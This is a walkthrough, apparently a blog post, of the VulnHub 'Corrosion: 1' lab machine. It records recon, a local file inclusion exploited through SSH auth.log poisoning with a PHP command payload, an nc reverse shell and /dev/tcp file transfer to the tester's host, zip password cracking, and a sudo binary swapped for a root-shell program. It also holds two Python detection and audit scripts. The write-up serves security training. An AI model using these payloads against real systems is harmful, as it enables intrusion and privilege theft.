CORROSION: 1

Download: https://download.vulnhub.com/corrosion/Corrosion.ova

Description

Difficulty: Easy
An easy box for beginners, but not too easy. Good Luck.
Hint: Enumerate Property.

The box author is a content creator I like: Proxy Programmer

1: Information Gathering

Scan for the target IP with netdiscover

 Currently scanning: Finished!   |   Screen View: Unique Hosts
 
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.1.1     50:d2:f5:7c:60:ea      1      60  Beijing Xiaomi Mobile Software Co., Ltd
 192.168.1.83    08:00:27:71:22:e6      1      60  PCS Systemtechnik GmbH
 192.168.1.238   52:96:66:d8:a6:d9      1      60  Unknown vendor    

Port scanning

Full port scan

$ nmap -p- --min-rate 10000 192.168.1.83
Starting Nmap 7.80 ( https://nmap.org ) at 2023-05-26 04:51 EDT
Nmap scan report for 192.168.1.83
Host is up (0.0020s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 1.83 seconds

--script=default and version scan

$ nmap -p22,80 -sC -sV 192.168.1.83
Starting Nmap 7.80 ( https://nmap.org ) at 2023-05-26 04:55 EDT
Nmap scan report for 192.168.1.83
Host is up (0.00046s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Ubuntu 5ubuntu1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.46 ((Ubuntu))
|_http-server-header: Apache/2.4.46 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.48 seconds

--script=vuln scan

$ nmap -p22,80 --script=vuln 192.168.1.83
Starting Nmap 7.80 ( https://nmap.org ) at 2023-05-26 04:56 EDT
Nmap scan report for 192.168.1.83
Host is up (0.00085s latency).

PORT   STATE SERVICE
22/tcp open  ssh
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open  http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.

Nmap done: 1 IP address (1 host up) scanned in 31.55 seconds

Directory brute-forcing

$ gobuster -u http://192.168.1.83/ -w /wordlist/directory-list-2.3-medium.txt -x php,txt,html

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.1.83/
[+] Threads      : 10
[+] Wordlist     : /wordlist/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions   : php,txt,html
[+] Timeout      : 10s
=====================================================
2023/05/26 05:00:21 Starting gobuster
=====================================================
/index.html (Status: 200)
/tasks (Status: 301)
/blog-post (Status: 301)
/server-status (Status: 403)
=====================================================
2023/05/26 05:01:21 Finished
=====================================================

Enumerating the blog-post directory

$ gobuster dir  -u "http://192.168.1.83/blog-post/" -w /wordlist/directory-list-2.3-medium.txt -x php,txt,html
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.83/blog-post/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /wordlist/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              txt,html,php
[+] Timeout:                 10s
===============================================================
2023/05/26 05:14:45 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 277]
/.php                 (Status: 403) [Size: 277]
/index.html           (Status: 200) [Size: 190]
/archives             (Status: 301) [Size: 325] [--> http://192.168.1.83/blog-post/archives/]
/uploads              (Status: 301) [Size: 324] [--> http://192.168.1.83/blog-post/uploads/]
/.html                (Status: 403) [Size: 277]
/.php                 (Status: 403) [Size: 277]
Progress: 877849 / 882244 (99.50%)
===============================================================
2023/05/26 05:15:25 Finished
===============================================================

2: Getting a Shell

First, look at the first directory, tasks

$ curl http://192.168.1.83/tasks/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /tasks</title>
 </head>
 <body>
<h1>Index of /tasks</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="tasks_todo.txt">tasks_todo.txt</a></td><td align="right">2021-07-29 17:17  </td><td align="right">118 </td><td>&nbsp;</td></tr>
   <tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.46 (Ubuntu) Server at 192.168.1.83 Port 80</address>
</body></html>
$ curl http://192.168.1.83/tasks/tasks_todo.txt
# Tasks that need to be completed

1. Change permissions for auth log
2. Change port 22 -> 7672
3. Set up phpMyAdmin

Fuzzing the parameter name of randylogs.php with ffuf

$ ffuf -u "http://192.168.1.83/blog-post/archives/randylogs.php?FUZZ=/etc/passwd" -w /wordlist/rockyou.txt --fw 1

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.1.0
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.1.83/blog-post/archives/randylogs.php?FUZZ=/etc/passwd
 :: Wordlist         : FUZZ: /wordlist/rockyou.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
 :: Filter           : Response words: 1
________________________________________________

file                    [Status: 200, Size: 2832, Words: 38, Lines: 49]
:: Progress: [13336306/13336306] :: Job [1/1] :: 28557 req/sec :: Duration: [0:07:47] :: Errors: 518 ::

Reading /etc/passwd through the file parameter with curl

 curl http://192.168.1.83/blog-post/archives/randylogs.php?file=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:115::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:109:117:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:110:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:111:118:RealtimeKit,,,:/proc:/usr/sbin/nologin
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
avahi:x:113:120:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin
cups-pk-helper:x:114:121:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:115:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
nm-openvpn:x:117:122:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
whoopsie:x:118:123::/nonexistent:/bin/false
sssd:x:119:124:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
saned:x:120:126::/var/lib/saned:/usr/sbin/nologin
colord:x:121:127:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:122:128::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:123:129:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
hplip:x:124:7:HPLIP system user,,,:/run/hplip:/bin/false
gnome-initial-setup:x:125:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:126:131:Gnome Display Manager:/var/lib/gdm3:/bin/false
randy:x:1000:1000:randy,,,:/home/randy:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:127:65534::/run/sshd:/usr/sbin/nologin

Then use the log-poisoning tactic: send PHP code as the SSH username so that sshd writes it into auth.log, which randylogs.php will then include.

$ ssh "<?php phpinfo(); ?>"@192.168.1.83
<?php phpinfo(); ?>@192.168.1.83's password: 
Permission denied, please try again.
<?php phpinfo(); ?>@192.168.1.83's password:
curl -v "http://192.168.1.83/blog-post/archives/randylogs.php?file=/var/log/auth.log"

Because I had run hydra to brute-force SSH, auth.log had filled up with entries and was very slow to load, so I started a fresh target VM.

New target IP: 192.168.1.23
Injection

$ ssh "<?php system(\$_GET['cmd']); ?>"@192.168.1.23
<?php system($_GET['cmd']); ?>@192.168.1.23's password: 
Permission denied, please try again.
<?php system($_GET['cmd']); ?>@192.168.1.23's password: 

Success

$ curl "http://192.168.1.23/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=id"
May 26 13:18:35 corrosion gdm-launch-environment]: pam_unix(gdm-launch-environment:session): session opened for user gdm by (uid=0)
May 26 13:18:35 corrosion systemd-logind[629]: New session c1 of user gdm.
May 26 13:18:35 corrosion systemd: pam_unix(systemd-user:session): session opened for user gdm by (uid=0)
May 26 13:18:36 corrosion polkitd(authority=local): Registered Authentication Agent for unix-session:c1 (system bus name :1.42 [/usr/bin/gnome-shell], object path /org/freedesktop/PolicyKit1/AuthenticationAgent, locale en_US.UTF-8)
May 26 13:19:00 corrosion dbus-daemon[593]: [system] Failed to activate service 'org.bluez': timed out (service_start_timeout=25000ms)
May 26 13:19:01 corrosion CRON[1348]: pam_unix(cron:session): session opened for user root by (uid=0)
May 26 13:19:01 corrosion CRON[1348]: pam_unix(cron:session): session closed for user root
May 26 05:19:32 corrosion systemd-logind[629]: Watching system buttons on /dev/input/event2 (AT Translated Set 2 keyboard)
May 26 05:19:32 corrosion systemd-logind[629]: Watching system buttons on /dev/input/event0 (Power Button)
May 26 05:19:32 corrosion systemd-logind[629]: Watching system buttons on /dev/input/event1 (Sleep Button)
May 26 05:20:01 corrosion sshd[1967]: Invalid user  from 192.168.1.171 port 56928
May 26 05:20:02 corrosion sshd[1967]: pam_unix(sshd:auth): check pass; user unknown
May 26 05:20:02 corrosion sshd[1967]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.1.171 
May 26 05:20:03 corrosion CRON[1969]: pam_unix(cron:session): session opened for user root by (uid=0)
May 26 05:20:03 corrosion CRON[1969]: pam_unix(cron:session): session closed for user root
May 26 05:20:04 corrosion sshd[1967]: Failed password for invalid user  from 192.168.1.171 port 56928 ssh2
May 26 05:20:08 corrosion sshd[1967]: pam_unix(sshd:auth): check pass; user unknown
May 26 05:20:09 corrosion sshd[1967]: Failed password for invalid user  from 192.168.1.171 port 56928 ssh2
May 26 05:20:56 corrosion sshd[1967]: Connection closed by invalid user  192.168.1.171 port 56928 [preauth]
May 26 05:20:56 corrosion sshd[1967]: PAM 1 more authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.1.171 
May 26 05:21:01 corrosion CRON[2098]: pam_unix(cron:session): session opened for user root by (uid=0)
May 26 05:21:01 corrosion CRON[2098]: pam_unix(cron:session): session closed for user root
May 26 05:21:11 corrosion sshd[2393]: Invalid user uid=33(www-data) gid=33(www-data) groups=33(www-data)
 from 192.168.1.171 port 51870
May 26 05:21:14 corrosion sshd[2393]: pam_unix(sshd:auth): check pass; user unknown
May 26 05:21:14 corrosion sshd[2393]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.1.171 
May 26 05:21:15 corrosion sshd[2393]: Failed password for invalid user uid=33(www-data) gid=33(www-data) groups=33(www-data)
 from 192.168.1.171 port 51870 ssh2
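As an added example (not part of the writeup), a small Python detector for the auth.log poisoning shown above: it parses sshd "Invalid user" lines and flags login names that carry PHP tags or other non-username characters, then counts attempts per source IP. The sample lines are constructed to mirror the box's log format.

```python
import re
from collections import Counter
from dataclasses import dataclass

# sshd records the *unauthenticated* login name verbatim in auth.log, so whatever
# an attacker types as the SSH username lands in the file. randylogs.php on this
# box evidently include()s the path given in ?file= (the PHP in the log ran), so
# a username like "<?php system($_GET['cmd']); ?>" executes when the log is read.
INVALID_USER = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ [\d:]+) (?P<host>\S+) sshd\[\d+\]: "
    r"(?:Invalid user|Failed password for invalid user) (?P<user>.*?) "
    r"from (?P<src>\d+(?:\.\d+){3}) port \d+"
)
# Tokens that never belong in a legitimate login name.
CODE_MARKERS = re.compile(r"<\?php|<\?=|\$_(?:GET|POST|REQUEST|COOKIE)|\b(?:system|exec|passthru|shell_exec)\s*\(")
# Anything outside this set is not a plausible Unix username either.
USERNAME_OK = re.compile(r"[A-Za-z0-9._@-]*")

@dataclass(frozen=True)
class Finding:
    source_ip: str
    username: str
    reason: str

def scan_auth_log(lines):
    """Return a Finding for every sshd invalid-user line whose username looks like code."""
    findings = []
    for line in lines:
        m = INVALID_USER.match(line)
        if not m:
            continue  # CRON, logind and other non-sshd lines
        user = m.group("user")
        if CODE_MARKERS.search(user):
            findings.append(Finding(m.group("src"), user, "php-code-in-username"))
        elif not USERNAME_OK.fullmatch(user) or len(user) > 32:
            findings.append(Finding(m.group("src"), user, "non-username-characters"))
    return findings

def sources(findings):
    """Count flagged attempts per source IP, for alerting or blocking."""
    return Counter(f.source_ip for f in findings)

# Constructed sample lines, modelled on the auth.log excerpt in the writeup.
SAMPLE_AUTH_LOG = [
    "May 26 05:20:01 corrosion sshd[1967]: Invalid user  from 192.168.1.171 port 56928",
    "May 26 05:20:04 corrosion sshd[1967]: Failed password for invalid user  from 192.168.1.171 port 56928 ssh2",
    "May 26 05:21:01 corrosion CRON[2098]: pam_unix(cron:session): session opened for user root by (uid=0)",
    "May 26 05:21:11 corrosion sshd[2393]: Invalid user <?php system($_GET['cmd']); ?> from 192.168.1.171 port 51870",
    "May 26 05:21:15 corrosion sshd[2393]: Failed password for invalid user <?php system($_GET['cmd']); ?> from 192.168.1.171 port 51870 ssh2",
    "May 26 05:22:09 corrosion sshd[2410]: Invalid user admin from 192.168.1.50 port 40022",
]

if __name__ == "__main__":
    for f in scan_auth_log(SAMPLE_AUTH_LOG):
        print(f"[!] {f.reason}: {f.username!r} from {f.source_ip}")
```

The detector only catches the symptom; the fix on the web side is to stop passing a user-controlled path to include() and restrict it to an allowlist of log names.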

Confirmed that nc is present with which nc, then used the nc mkfifo reverse shell

$ curl "http://192.168.1.23/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Cbash%20-i%202%3E%261%7Cnc%20192.168.1.171%201234%20%3E%2Ftmp%2Ff"

Reverse shell obtained

$ nc -lvvp 1234
listening on [any] 1234 ...
192.168.1.23: inverse host lookup failed: Unknown host
connect to [192.168.1.171] from (UNKNOWN) [192.168.1.23] 41908
bash: cannot set terminal process group (836): Inappropriate ioctl for device
bash: no job control in this shell
www-data@corrosion:/var/www/html/blog-post/archives$ 

3: Privilege Escalation

Found user_backup.zip in /var/backups

$ ls -la
ls -la
total 2668
drwxr-xr-x  2 root root    4096 May 26 05:23 .
drwxr-xr-x 15 root root    4096 Jul 29  2021 ..
-rw-r--r--  1 root root   61440 May 26 05:23 alternatives.tar.0
-rw-r--r--  1 root root    2867 Jul 29  2021 alternatives.tar.1.gz
-rw-r--r--  1 root root  102709 Jul 29  2021 apt.extended_states.0
-rw-r--r--  1 root root      11 Jul 29  2021 dpkg.arch.0
-rw-r--r--  1 root root      43 Jul 29  2021 dpkg.arch.1.gz
-rw-r--r--  1 root root      43 Jul 29  2021 dpkg.arch.2.gz
-rw-r--r--  1 root root     616 Jul 29  2021 dpkg.diversions.0
-rw-r--r--  1 root root     220 Jul 29  2021 dpkg.diversions.1.gz
-rw-r--r--  1 root root     220 Jul 29  2021 dpkg.diversions.2.gz
-rw-r--r--  1 root root     272 Jul 29  2021 dpkg.statoverride.0
-rw-r--r--  1 root root     194 Jul 29  2021 dpkg.statoverride.1.gz
-rw-r--r--  1 root root     168 Apr 20  2021 dpkg.statoverride.2.gz
-rw-r--r--  1 root root 1721335 Jul 30  2021 dpkg.status.0
-rw-r--r--  1 root root  395230 Jul 29  2021 dpkg.status.1.gz
-rw-r--r--  1 root root  386883 Jul 29  2021 dpkg.status.2.gz
-rw-r--r--  1 root root    3285 Jul 30  2021 user_backup.zip

Try transferring it to Kali with nc
On Kali:

$ nc -lvnp 1233 > user_backup.zip

On the target:

www-data@corrosion:/var/backups$ cat user_backup.zip > /dev/tcp/192.168.1.171/1233

Then discovered that the zip is password-protected

$ fcrackzip -u -D -p /wordlist/dict.txt user.zip 


PASSWORD FOUND!!!!: pw == !randybaby
$ unzip user.zip 
Archive:  user.zip
[user.zip] id_rsa password: 
  inflating: id_rsa                  
  inflating: id_rsa.pub              
 extracting: my_password.txt         
  inflating: easysysinfo.c
$ ls
easysysinfo.c  id_rsa  id_rsa.pub  my_password.txt  user.zip

Ok

$ ssh randy@192.168.1.23 -i id_rsa 
randy@192.168.1.23's password: randylovesgoldfish1998
Welcome to Ubuntu 21.04 (GNU/Linux 5.11.0-25-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

119 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Fri Jul 30 15:28:02 2021 from 10.0.0.69
randy@corrosion:~$ 

Escalating to root

randy@corrosion:~/tools$ sudo -l
Matching Defaults entries for randy on corrosion:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User randy may run the following commands on corrosion:
    (root) PASSWD: /home/randy/tools/easysysinfo
randy@corrosion:~/tools$ rm * -rf
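The sudo rule above points at a binary inside randy's own home directory, which is why it can be deleted and replaced. As an added example (not from the writeup), this Python audit extracts the command paths from sudo -l output and walks each path and its parent directories, reporting anything not owned by root or writable by group/others; the stat table is constructed to mirror the box layout.

```python
import os
import re
import stat
from pathlib import PurePosixPath

# sudo -l on the box reports "(root) PASSWD: /home/randy/tools/easysysinfo".
# The target sits under a directory randy owns, so randy can remove and replace
# the binary and sudo will run the replacement as root. A safe rule needs the
# target *and every ancestor up to /* to be root-owned and not group/world writable.
SUDO_RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?:(?:NO)?PASSWD:\s*)?(?P<cmd>/\S+)")

def sudo_targets(sudo_l_output):
    """Extract absolute command paths from the rules section of `sudo -l` output."""
    return [m.group("cmd") for line in sudo_l_output.splitlines()
            if (m := SUDO_RULE.match(line))]

def audit_sudo_target(path, stat_of):
    """Return findings for a sudo-permitted command `path`.

    stat_of(p) -> (owner_uid, mode); use fs_stat for the live system or a dict
    lookup (as with the constructed table below) for offline checks.
    """
    findings = []
    target = PurePosixPath(path)
    for p in [target, *target.parents]:          # target, then /home/randy/tools, ..., /
        uid, mode = stat_of(str(p))
        label = "target" if p == target else "parent"
        if uid != 0:
            findings.append(f"{label} {p} is owned by uid {uid}, not root")
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append(f"{label} {p} is group/world writable (mode {oct(mode & 0o7777)})")
    return findings

def fs_stat(p):
    """stat_of implementation for the live filesystem."""
    st = os.stat(p)
    return st.st_uid, st.st_mode

# Constructed stat table mirroring the box (randy is uid 1000). The binary itself
# is given root ownership here to show that a user-owned parent directory alone
# already makes the rule unsafe.
BOX_STAT = {
    "/": (0, 0o40755), "/home": (0, 0o40755),
    "/home/randy": (1000, 0o40755), "/home/randy/tools": (1000, 0o40755),
    "/home/randy/tools/easysysinfo": (0, 0o100755),
    "/usr": (0, 0o40755), "/usr/bin": (0, 0o40755), "/usr/bin/id": (0, 0o100755),
}

SUDO_L = """User randy may run the following commands on corrosion:
    (root) PASSWD: /home/randy/tools/easysysinfo
"""

if __name__ == "__main__":
    for cmd in sudo_targets(SUDO_L):
        for finding in audit_sudo_target(cmd, BOX_STAT.__getitem__):
            print(f"[!] {cmd}: {finding}")
```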

Then write a replacement easysysinfo

randy@corrosion:~/tools$ cat exploit.c 
#include <unistd.h>
void main()
{
  setuid(0);
  setgid(0);
  system("/usr/bin/bash -i");
}
randy@corrosion:~/tools$ gcc exploit.c -o easysysinfo
exploit.c: In function ‘main’:
exploit.c:6:3: warning: implicit declaration of function ‘system’ [-Wimplicit-function-declaration]
    6 |   system("/usr/bin/bash -i");
      |   ^~~~~~
randy@corrosion:~/tools$ chmod 755 easysysinfo 
randy@corrosion:~/tools$ chmod +s easysysinfo 
randy@corrosion:~/tools$ sudo /home/randy/tools/easysysinfo
root@corrosion:/home/randy/tools# id
uid=0(root) gid=0(root) groups=0(root)
root@corrosion:/home/randy/tools# cd /root
root@corrosion:~# cat root.txt 
NULLLLLLLLLLLLLLLLLLLLLLLLLLLLLL

Congrats! Hope you enjoyed my first machine posted on VulnHub! 
Ping me on twitter @proxyprgrammer for any suggestions.

Youtube: https://www.youtube.com/c/ProxyProgrammer
Twitter: https://twitter.com/proxyprgrammer
root@corrosion:~#
Posted on 2023-09-04 16:57 by 丛中人